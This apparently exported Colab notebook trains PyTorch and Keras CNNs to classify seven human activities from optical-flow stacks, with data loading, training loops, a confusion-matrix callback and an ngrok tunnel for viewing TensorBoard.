# + id="W_y4bc8W3Can" colab_type="code" colab={}
# + id="JI-kGHPf3CVw" colab_type="code" colab={}
# + id="HdwJb6MX3COm" colab_type="code" colab={}
# + id="GBYr0s2c3CIO" colab_type="code" colab={}
# + id="RXzdhR3X3CDh" colab_type="code" colab={}
# + id="KXTI6eA83B-Y" colab_type="code" colab={}
# + id="lpEy24vb3B5h" colab_type="code" colab={}
# + id="jyTXSU8p3B0v" colab_type="code" colab={}
# + id="Wz-EyaN-3Bv8" colab_type="code" colab={}
# + id="KK2f3phK3BqU" colab_type="code" colab={}
# + id="r09Krxdfu4cv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="4bf56ddb-a329-410a-c05d-d364fdefff88"
# + id="Tk2dufB79g-u" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="4ab16db5-25ac-4ef8-ab9a-a86538b9a365"
# + id="IpZXnYBVu4Ys" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="fb4aa4b2-b4d0-4261-a31e-c69bba98c491"
train_dataset = activityDataset('data', train_labels, transform)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size//2,
shuffle=True
)
val_loader = torch.utils.data.DataLoader(
activityDataset('data', valid_labels, transform),
batch_size=batch_size//2,
shuffle=True
)
# + id="LjqrjQHbu4Oi" colab_type="code" colab={}
# + id="fm2x_71vu4Jl" colab_type="code" colab={}
# + id="KpLysXNjhdgG" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="b4af9d4f-32d2-4b3d-a901-a2ecace7d29b"
import pandas as pd
import numpy as np
train = pd.read_csv("train.csv",index_col = 0)
test = pd.read_csv("test.csv",index_col=0)
#print (train.shape)
#print (test.shape)
train.reset_index()
test.reset_index()
train.index = range(train.shape[0])
test.index = range(test.shape[0])
#print(train.shape[0])
target = train['label']
features = train.drop('label',axis=1)
X_data = features['id']
y_data = target
# + id="Qyfzw8EutvWt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1969} outputId="7b8cdbd3-7871-41e6-fbde-ae3a194ca5b6"
# + id="hRGsQmKahddo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="faf3667a-866d-4686-f1c2-f839b7703a64"
dim = (216,216)
batch_size = X_data.shape[0]
n_classes = 7
n_channels = 20
shuffle = True
def data_generation(list_IDs_temp,labels):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((batch_size, *dim, n_channels))
y = np.empty((batch_size), dtype=int)
# Generate data
for i, ID in enumerate(list_IDs_temp):
#print(i,ID)
# Store sample
X[i,] = np.load('data/' + ID )
# Store class
y[i] = labels[i]
return X , keras.utils.to_categorical(y, num_classes=n_classes)
# + id="lZEYEHRuhdab" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="a27530c4-3dfa-4843-c308-407e1b9178fa"
# Datasets
partition = X_data
labels = y_data
#keras.utils.to_categorical(y, num_classes=n_classes)
# Generators
xData,yData = data_generation(partition,labels)
# + id="cbnKiQmchdVw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 71} outputId="d7878b23-a6b4-4a84-e965-7dc32e4c03bd"
from sklearn.cross_validation import train_test_split
random_seed = 2
trainData, testData = train_test_split(xData, test_size=0.2,random_state=random_seed)
trainLabels, testLabels = train_test_split(labels, test_size=0.2,random_state=random_seed)
# + id="Kq65l_JDHXrl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="82cf1ddd-5a47-4ebf-992b-b02cfb32e7f6"
import numpy
images_batch = torch.from_numpy(trainData).float()
#images_batch = torch.from_numpy(numpy.array(trainData))
#images_batch = torch.stack([torch.Tensor(i) for i in trainData])
labels_batch = torch.from_numpy(numpy.array(trainLabels))
# + id="B3TjlOrAJmCi" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="6aa227e3-6502-4e03-850e-904c7e0be5f5"
images_batch_val = torch.from_numpy(testData).float()
#images_batch_val = torch.from_numpy(numpy.array(testData))
#images_batch_val = torch.stack([torch.Tensor(i) for i in testData])
labels_batch_val = torch.from_numpy(numpy.array(testLabels))
# + id="VCvCmNT2suH3" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 163} outputId="7fd50b2d-8d24-43b3-df56-3c7f087fc0d8"
train_dataset
# + id="bAkCeKvpJSzK" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="001b60b3-727d-45a7-db07-e7fe280e9f5f"
train_dataset = images_batch,trainLabels
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True
)
val_dataset = images_batch_val , testLabels
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size,
shuffle=True
)
# + id="434T32iAM3gC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="85e51a4e-a580-45c9-b3ae-8a3a55ef1643"
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
# + id="US4WfaxsXlvA" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 656} outputId="c2002a33-317d-4aa5-a32d-2c3a54ce668c"
loader = iter(train_loader)
next(loader)
# + id="Qklftlp7F6WX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="4722a531-5cac-4fc9-a7ac-745e0dc435f2"
model = model.cuda()
# + id="aXpsS8RWP7NB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 911} outputId="77f43219-9581-483c-b57d-5cde7d05e2dd"
train(model, train_loader, val_loader, optimizer, criterion, epochs=5) #, scheduler=scheduler)
# + id="G7jwzCsT2Ice" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="64f4d76f-ed08-4259-d08c-6716f7d83a4e"
def train(model, train, valid, optimizer, criterion, epochs=1, scheduler=None):
for epoch in range(epochs):
print('Epoch ', epoch + 1, '/', epochs)
running_loss = 0.
running_corrects = 0.
running_batches = 0.
if scheduler:
scheduler.step()
model.train()
for i, (input, target) in enumerate(train):
input = input.cuda()
target = target.cuda()
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
optimizer.zero_grad()
# compute output
output = model(input_var)
_, preds = torch.max(output.data, 1)
loss = criterion(output, target_var)
loss.backward()
optimizer.step()
running_loss += loss.data[0]
running_corrects += torch.sum(preds == target)
running_batches += 1.
print('\r', 'Batch', i, 'Loss', loss.data[0], end='')
train_loss = running_loss / running_batches
train_acc = running_corrects / len(train.dataset.labels)
print('\r', "Train Loss", train_loss, "Train Accuracy", train_acc)
running_loss = 0.
running_corrects = 0.
running_batches = 0.
model.eval()
for i, (input, target) in enumerate(valid):
input = input.cuda()
target = target.cuda()
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
output = model(input_var)
_, preds = torch.max(output.data, 1)
loss = criterion(output, target_var)
running_loss += loss.data[0]
running_corrects += torch.sum(preds == target)
running_batches += 1.
valid_loss = running_loss / running_batches
valid_acc = running_corrects / len(valid.dataset.labels)
#print()
print('\r', "Val Loss", valid_loss, "Val Accuracy", valid_acc)
# + id="CdfhcVyb2cHg" colab_type="code" colab={}
# + id="vMW9_cJP2EKU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 350} outputId="0f646ac8-6bdb-4e42-8c06-5ac351a0962a"
#model = models.resnet34(pretrained= True, channel=10*2).cuda()
for param in model.parameters():
param.requires_grad = False
num_ftrs = model.classifier.in_features
model.classifier = nn.Linear(num_ftrs, num_classes)
model = model.cuda()
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.Adam(model.classifier.parameters()) #torch.optim.SGD(model.classifier.parameters(), lr=0.001, momentum=0.9)
#scheduler = lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)
# + id="TxqKx1h-2EGz" colab_type="code" colab={}
train(model, train_loader, val_loader, optimizer, criterion, epochs=5) #, scheduler=scheduler)
# + id="lm7y3Uz32ECY" colab_type="code" colab={}
# + id="HieoF4-hqXlN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 775} outputId="4d73e1e2-ad87-46c9-8a43-28d2f9563c65"
loader = iter(train_loader)
next(loader)
# + id="tDCcNL17PdDc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="a442da9e-544d-4f7c-a058-0e8feb3858d7"
import os
# + id="ZJD4cTbEawnQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="a02ea983-08cb-463b-83f0-5190a2e0d8d2"
import pickle,os
from PIL import Image
import scipy.io
import time
from tqdm import tqdm
import pandas as pd
import shutil
from random import randint
import numpy as np
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.models as models
import torch.nn as nn
import torch
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
# other util
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, checkpoint, model_best):
torch.save(state, checkpoint)
if is_best:
shutil.copyfile(checkpoint, model_best)
def record_info(info,filename,mode):
if mode =='train':
result = (
'Time {batch_time} '
'Data {data_time} \n'
'Loss {loss} '
'Prec@1 {top1} '
'Prec@5 {top5}\n'
'LR {lr}\n'.format(batch_time=info['Batch Time'],
data_time=info['Data Time'], loss=info['Loss'], top1=info['Prec@1'], top5=info['Prec@5'],lr=info['lr']))
print(result)
df = pd.DataFrame.from_dict(info)
column_names = ['Epoch','Batch Time','Data Time','Loss','Prec@1','Prec@5','lr']
if mode =='test':
result = (
'Time {batch_time} \n'
'Loss {loss} '
'Prec@1 {top1} '
'Prec@5 {top5} \n'.format( batch_time=info['Batch Time'],
loss=info['Loss'], top1=info['Prec@1'], top5=info['Prec@5']))
print(result)
df = pd.DataFrame.from_dict(info)
column_names = ['Epoch','Batch Time','Loss','Prec@1','Prec@5']
if not os.path.isfile(filename):
df.to_csv(filename,index=False,columns=column_names)
else: # else it exists so append without writing the header
df.to_csv(filename,mode = 'a',header=False,index=False,columns=column_names)
# + id="wf5ieEl6w1yh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="2ca3430a-08c3-430b-bb9d-359fd15976b7"
class Motion_CNN():
def __init__(self, nb_epochs, lr, batch_size, resume, start_epoch, train_loader, test_loader, channel):
self.nb_epochs=nb_epochs
self.lr=lr
self.batch_size=batch_size
self.resume=resume
self.start_epoch=start_epoch
#self.evaluate=evaluate
self.train_loader=train_loader
self.test_loader=test_loader
self.best_prec1=0
self.channel=channel
#self.test_video=test_video
def build_model(self):
print ('==> Build model and setup loss and optimizer')
#build model
self.model = resnet34(pretrained= True, channel=self.channel).cuda()
#print self.model
#Loss function and optimizer
self.criterion = nn.CrossEntropyLoss().cuda()
self.optimizer = torch.optim.SGD(self.model.parameters(), self.lr, momentum=0.9)
self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=1,verbose=True)
'''def resume_and_evaluate(self):
if self.resume:
if os.path.isfile(self.resume):
print("==> loading checkpoint '{}'".format(self.resume))
checkpoint = torch.load(self.resume)
self.start_epoch = checkpoint['epoch']
self.best_prec1 = checkpoint['best_prec1']
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
print("==> loaded checkpoint '{}' (epoch {}) (best_prec1 {})"
.format(self.resume, checkpoint['epoch'], self.best_prec1))
else:
print("==> no checkpoint found at '{}'".format(self.resume))
"""if self.evaluate:
self.epoch=0
prec1, val_loss = self.validate_1epoch()
return"""'''
def run(self):
self.build_model()
#self.resume_and_evaluate()
cudnn.benchmark = True
for self.epoch in range(self.start_epoch, self.nb_epochs):
self.train_1epoch()
prec1, val_loss = self.validate_1epoch()
is_best = prec1 > self.best_prec1
#lr_scheduler
self.scheduler.step(val_loss)
# save model
if is_best:
self.best_prec1 = prec1
with open('best_weight.pickle','wb') as f:
pickle.dump(self.dic_video_level_preds,f)
f.close()
save_checkpoint({
'epoch': self.epoch,
'state_dict': self.model.state_dict(),
'best_prec1': self.best_prec1,
'optimizer' : self.optimizer.state_dict()
},is_best,'checkpoint.pth.tar','model_best.pth.tar')
def train_1epoch(self):
print('==> Epoch:[{0}/{1}][training stage]'.format(self.epoch, self.nb_epochs))
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
#switch to train mode
self.model.train()
end = time.time()
# mini-batch training
progress = tqdm(self.train_loader)
print(progress)
for i, (data,label) in enumerate(progress):
# measure data loading time
data_time.update(time.time() - end)
label = label.cuda(async=True)
input_var = Variable(data).cuda()
target_var = Variable(label).cuda()
# compute output
output = self.model(input_var)
loss = self.criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, label, topk=(1, 5))
losses.update(loss.data[0], data.size(0))
top1.update(prec1[0], data.size(0))
top5.update(prec5[0], data.size(0))
# compute gradient and do SGD step
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
info = {'Epoch':[self.epoch],
'Batch Time':[round(batch_time.avg,3)],
'Data Time':[round(data_time.avg,3)],
'Loss':[round(losses.avg,5)],
'Prec@1':[round(top1.avg,4)],
'Prec@5':[round(top5.avg,4)],
'lr': self.optimizer.param_groups[0]['lr']
}
record_info(info, 'opf_train.csv','train')
# + id="_ImSXFXPMeMy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 979} outputId="82581b4c-6833-4d33-b9fd-f0d110b66107"
model = Motion_CNN(
# Data Loader
train_loader=train_loader,
test_loader=val_loader,
# Utility
start_epoch=start_epoch,
resume=resume,
#evaluate=evaluate,
# Hyper-parameter
nb_epochs=epochs,
lr=lr,
batch_size=batch_size,
channel = 10*2,
#test_video=test_video
)
#Training
model.run()
# + id="ueRv2XSMZjmO" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="b53e9e30-0ff3-486b-95cb-904c9996b13c"
print(train_loader)
# + id="D-C60MV4RTY1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="5c7bb4cd-f3df-409f-8b46-a3a13daec2d0"
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, i=1, precision=3):
self.meters = i
self.precision = precision
self.reset(self.meters)
def reset(self, i):
self.val = [0]*i
self.avg = [0]*i
self.sum = [0]*i
self.count = 0
def update(self, val, n=1):
if not isinstance(val, list):
val = [val]
assert(len(val) == self.meters)
self.count += n
for i,v in enumerate(val):
self.val[i] = v
self.sum[i] += v * n
self.avg[i] = self.sum[i] / self.count
def __repr__(self):
val = ' '.join(['{:.{}f}'.format(v, self.precision) for v in self.val])
avg = ' '.join(['{:.{}f}'.format(a, self.precision) for a in self.avg])
return '{} ({})'.format(val, avg)
# + id="axN29v-ehdQF" colab_type="code" colab={}
def validate_1epoch(self):
print('==> Epoch:[{0}/{1}][validation stage]'.format(self.epoch, self.nb_epochs))
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
self.model.eval()
self.dic_video_level_preds={}
end = time.time()
progress = tqdm(self.test_loader)
for i, (keys,data,label) in enumerate(progress):
#data = data.sub_(127.353346189).div_(14.971742063)
label = label.cuda(async=True)
data_var = Variable(data, volatile=True).cuda(async=True)
label_var = Variable(label, volatile=True).cuda(async=True)
# compute output
output = self.model(data_var)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
#Calculate video level prediction
preds = output.data.cpu().numpy()
nb_data = preds.shape[0]
for j in range(nb_data):
videoName = keys[j].split('-',1)[0] # ApplyMakeup_g01_c01
if videoName not in self.dic_video_level_preds.keys():
self.dic_video_level_preds[videoName] = preds[j,:]
else:
self.dic_video_level_preds[videoName] += preds[j,:]
#Frame to video level accuracy
video_top1, video_top5, video_loss = self.frame2_video_level_accuracy()
info = {'Epoch':[self.epoch],
'Batch Time':[round(batch_time.avg,3)],
'Loss':[round(video_loss,5)],
'Prec@1':[round(video_top1,3)],
'Prec@5':[round(video_top5,3)]
}
record_info(info, 'opf_test.csv','test')
return video_top1, video_loss
def frame2_video_level_accuracy(self):
correct = 0
video_level_preds = np.zeros((len(self.dic_video_level_preds),101))
video_level_labels = np.zeros(len(self.dic_video_level_preds))
ii=0
for key in sorted(self.dic_video_level_preds.keys()):
name = key.split('-',1)[0]
preds = self.dic_video_level_preds[name]
label = int(self.test_video[name])-1
video_level_preds[ii,:] = preds
video_level_labels[ii] = label
ii+=1
if np.argmax(preds) == (label):
correct+=1
#top1 top5
video_level_labels = torch.from_numpy(video_level_labels).long()
video_level_preds = torch.from_numpy(video_level_preds).float()
loss = self.criterion(Variable(video_level_preds).cuda(), Variable(video_level_labels).cuda())
top1,top5 = accuracy(video_level_preds, video_level_labels, topk=(1,5))
top1 = float(top1.numpy())
top5 = float(top5.numpy())
return top1,top5,loss.data.cpu().numpy()
# + id="qBR1w9g0hdMh" colab_type="code" colab={}
# + id="LzehzjNjhdJi" colab_type="code" colab={}
# + id="RkeA95SzhdGD" colab_type="code" colab={}
# + id="aOl4BVCZhdC4" colab_type="code" colab={}
# + id="axAQcpiBhc_7" colab_type="code" colab={}
# + id="kxhcq-bBhc82" colab_type="code" colab={}
# + id="svHKKl3hhc51" colab_type="code" colab={}
# + id="IQ_yCxBDhc2v" colab_type="code" colab={}
# + id="FH2shZM9DQTK" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 292} outputId="00d95b23-6118-4823-f1a2-a12a4115a8d1"
# !pip install git+https://github.com/wookayin/tensorflow-plot.git@master
# + id="77RTww7FBQse" colab_type="code" colab={}
import keras
from keras.layers import Input
from keras.layers import Dense
from keras.layers import Convolution2D
from keras.layers import MaxPooling2D
from keras.layers import BatchNormalization
from keras.layers import Activation
from keras.layers import Dropout
from keras.layers import Flatten
from keras.models import Model
import os
from PIL import Image
from keras import optimizers
from sklearn.cross_validation import train_test_split
from keras.callbacks import ModelCheckpoint
from keras.callbacks import TensorBoard
import tensorflow as tf
from textwrap import wrap
import itertools
import matplotlib
#import tfplot
import re
from keras.callbacks import Callback
run_opts = tf.RunOptions(report_tensor_allocations_upon_oom = True)
from keras import backend as K
K.clear_session()
# + id="xAgZcGUCBQsy" colab_type="code" colab={}
from keras.models import Sequential, load_model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Conv2D, MaxPooling2D
# + id="dyDSPWmLBQs5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="b9c5f59a-799a-426c-a66a-7ca389cba6b1"
def temporal_CNN(input_shape, classes, weights_dir, include_top=True):
model = Sequential()
#conv1
model.add(Conv2D(128, (5, 5), strides=2, padding='same', input_shape=input_shape))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
#conv2
model.add(Conv2D(256, (5, 5), strides=2, padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
#conv3
model.add(Conv2D(512, (3, 3), strides=1, activation='relu', padding='same'))
#conv4
model.add(Conv2D(512, (3, 3), strides=1, activation='relu', padding='same'))
#conv5
model.add(Conv2D(512, (3, 3), strides=1, activation='relu', padding='same'))
model.add(MaxPooling2D(pool_size=(2, 2)))
#full6
model.add(Flatten())
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.9))
#full7
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.9))
#softmax
model.add(Dense(7, activation='softmax'))
return model
# + id="MgpuYn0OD2vc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="f11b2dd0-8134-4c62-82f8-e1b6eb1494af"
# %cd HAR
# + id="EN3QXBATYN9J" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="c24ae3fe-d5c7-437d-c260-2887fba2eb17"
# !ls
# + id="7_HDGxCCcRzv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="859a745d-76c7-4b03-8c6b-ce95eb66c425"
LOG_DIR = 'logs'
get_ipython().system_raw(
'tensorboard --logdir {} --host 0.0.0.0 --port 6006 &'
.format(LOG_DIR)
)
# + id="LIAH4g9p0zWM" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="4d3c3acf-d0aa-4f9d-cf7b-74c445d47a46"
# ! curl http://localhost:6006
# + id="ljlvuNeSdqWH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="3b0e8478-dc87-4752-e88b-32444ab4d06c"
# !wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip > /dev/null 2>&1
# ! unzip ngrok-stable-linux-amd64.zip > /dev/null 2>&1
# + id="LOGe2Xa7dqdU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="9e96d54a-0f77-467a-a8a6-2c8ae347032f"
get_ipython().system_raw('./ngrok http 6006 &')
# + id="je47LzATdqat" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="2fc9beb6-9ece-49e8-d08e-6f2e2fcb4997"
# ! curl -s http://localhost:4040/api/tunnels | python3 -c \
# "import sys, json; print(json.load(sys.stdin)['tunnels'][0]['public_url'])"
# + id="pVnqqqf0BQst" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="d5d75381-1715-4066-db89-ea863bb32e16"
def temporal_CNN(input_shape, classes, weights_dir, include_top=True):
'''
The CNN for optical flow input.
Since optical flow is not a common image, we cannot finetune pre-trained ResNet (The weights trained on imagenet is
for images and thus is meaningless for optical flow)
:param input_shape: the shape of optical flow input
:param classes: number of classes
:return:
'''
optical_flow_input = Input(shape=input_shape)
x = Convolution2D(96, kernel_size=(7, 7), strides=(2, 2), padding='same', name='tmp_conv1')(optical_flow_input)
x = BatchNormalization(axis=3)(x)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
x = Convolution2D(256, kernel_size=(5, 5), strides=(2, 2), padding='same', name='tmp_conv2')(x)
x = BatchNormalization(axis=3)(x)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
x = Convolution2D(512, kernel_size=(3, 3), strides=(2, 2), padding='same', name='tmp_conv3')(x)
x = BatchNormalization(axis=3)(x)
x = Activation('relu')(x)
x = Convolution2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same', name='tmp_conv4')(x)
x = BatchNormalization(axis=3)(x)
x = Activation('relu')(x)
x = Convolution2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same', name='tmp_conv5')(x)
x = BatchNormalization(axis=3)(x)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
x = Flatten()(x)
x = Dense(2048, activation='relu', name='tmp_fc6')(x)
x = Dropout(0.9)(x)
x = Dense(4096, activation='relu', name='tmp_fc7')(x)
x = Dropout(0.9)(x)
if include_top:
x = Dense(classes, activation='softmax', name='tmp_fc101')(x)
model = Model(inputs=optical_flow_input, outputs=x, name='temporal_CNN')
if os.path.exists(weights_dir):
model.load_weights(weights_dir, by_name=True)
return model
# + id="tuXDRs87WgdJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1003} outputId="8487c808-2abd-4179-beae-2528efdd53e3"
if __name__ == '__main__':
input_shape = (216, 216, 20)
N_CLASSES = 7
model = temporal_CNN(input_shape, N_CLASSES, weights_dir='')
print(model.summary())
# + id="B1fCXeq0BQtF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="2db0280e-2b07-4086-f45f-ef954a125250"
sgd = optimizers.SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)
lr = 0.001
beta_1 = 0.9
beta_2 = 0.999
epsilon = 10 ** (-8)
optimizer = optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon)
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'],options = run_opts)
# + id="JlrJBnVjBQtN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="07e6044e-3175-4377-e359-390e3469b689"
import pandas as pd
import numpy as np
train = pd.read_csv("train.csv",index_col = 0)
test = pd.read_csv("test.csv",index_col=0)
#print (train.shape)
#print (test.shape)
train.reset_index()
test.reset_index()
train.index = range(train.shape[0])
test.index = range(test.shape[0])
#print(train.shape[0])
target = train['label']
features = train.drop('label',axis=1)
X_data = features['id']
y_data = target
# + id="JqaiFrsNBQtT" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="df8990c9-7730-4ca3-ff54-50f8be38975f"
dim = (216,216)
batch_size = X_data.shape[0]
n_classes = 7
n_channels = 20
shuffle = True
def data_generation(list_IDs_temp,labels):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((batch_size, *dim, n_channels))
y = np.empty((batch_size), dtype=int)
# Generate data
for i, ID in enumerate(list_IDs_temp):
#print(i,ID)
# Store sample
X[i,] = np.load('data/' + ID )
# Store class
y[i] = labels[i]
return X , keras.utils.to_categorical(y, num_classes=n_classes)
# + id="t_0_Pu1xU6s_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="316c4b2c-0a01-43cb-c825-7ef25193e7fa"
# !ls
# + id="Nwy94ZE5BQtb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="9759e6e1-6449-47e4-dabe-6490fce56f64"
# Datasets
partition = X_data
labels = y_data
#keras.utils.to_categorical(y, num_classes=n_classes)
# Generators
xData,yData = data_generation(partition,labels)
# + id="AtbcuYlqBQtr" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="c1588865-7203-4854-d503-e8dad4087e9c"
random_seed = 2
trainData, testData = train_test_split(xData, test_size=0.2,random_state=random_seed)
trainLabels, testLabels = train_test_split(yData, test_size=0.2,random_state=random_seed)
# + id="DHN9dqbfBQt0" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a7a805d0-d97b-4175-91cb-bbfcecd9375d"
trainData.shape,testData.shape
# + id="4HiI1IAuBQuw" colab_type="code" colab={}
class SensitivitySpecificityCallback(Callback):
def on_epoch_end(self, epoch, logs=None):
normalize=False
title='Confusion matrix'
tensor_name = 'image'
session=tf.Session()
img_d_summary_dir = os.path.join('logs', "image")
img_d_summary_writer = tf.summary.FileWriter(img_d_summary_dir, session.graph)
x_test = self.validation_data[0]
y_test = self.validation_data[1]
#print(y_test)
# x_test, y_test = self.validation_data
predictions = self.model.predict(x_test)
#print(predictions)
y_test = np.argmax(y_test, axis=-1)
predictions = np.argmax(predictions, axis=-1)
#c = confusion_matrix(y_test, predictions)
correct_labels = y_test
predict_labels = predictions
conf = tf.contrib.metrics.confusion_matrix(correct_labels, predict_labels)
cm=session.run(conf)
if normalize:
cm = cm.astype('float')*10 / cm.sum(axis=1)[:, np.newaxis]
cm = np.nan_to_num(cm, copy=True)
cm = cm.astype('int')
np.set_printoptions(precision=2)
fig = matplotlib.figure.Figure(figsize=(7, 7), dpi=320, facecolor='w', edgecolor='k')
ax = fig.add_subplot(1, 1, 1)
im = ax.imshow(cm, cmap='Oranges')
#classes = [re.sub(r'([a-z](?=[A-Z])|[A-Z](?=[A-Z][a-z]))', r'\1 ', x) for x in labels]
#classes = ['\n'.join(wrap(l, 40)) for l in classes]
classes = ['Bend','Hand-wave','Jump-in-place','Pull','Run','Sit-stand-up','Run']
tick_marks = np.arange(len(classes))
ax.set_xlabel('Predicted', fontsize=7)
ax.set_xticks(tick_marks)
c = ax.set_xticklabels(classes, fontsize=10, rotation=-90, ha='center')
ax.xaxis.set_label_position('bottom')
ax.xaxis.tick_bottom()
ax.set_ylabel('True Label', fontsize=7)
ax.set_yticks(tick_marks)
ax.set_yticklabels(classes, fontsize=10, va ='center')
ax.yaxis.set_label_position('left')
ax.yaxis.tick_left()
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
ax.text(j, i, format(cm[i, j], 'd') if cm[i,j]!=0 else '.', horizontalalignment="center", fontsize=6, verticalalignment='center', color= "black")
fig.set_tight_layout(True)
summary = tfplot.figure.to_summary(fig, tag=tensor_name)
img_d_summary_writer.add_summary(summary)
img_d_summary_writer.flush()
img_d_summary_writer.close()
#return summary
# + id="JANIGxvjBQut" colab_type="code" colab={}
class TrainValTensorBoard(TensorBoard):
def __init__(self, log_dir='./logs', **kwargs):
# Make the original `TensorBoard` log to a subdirectory 'training'
training_log_dir = os.path.join(log_dir, 'training')
super(TrainValTensorBoard, self).__init__(training_log_dir, **kwargs)
# Log the validation metrics to a separate subdirectory
self.val_log_dir = os.path.join(log_dir, 'validation')
#self.img_d_summary_dir = os.path.join(log_dir, "image")
def set_model(self, model):
# Setup writer for validation metrics
self.val_writer = tf.summary.FileWriter(self.val_log_dir)
#self.img_d_summary_writer = tf.summary.FileWriter(self.img_d_summary_dir)
super(TrainValTensorBoard, self).set_model(model)
def on_epoch_end(self, epoch, logs=None):
# Pop the validation logs and handle them separately with
# `self.val_writer`. Also rename the keys so that they can
# be plotted on the same figure with the training metrics
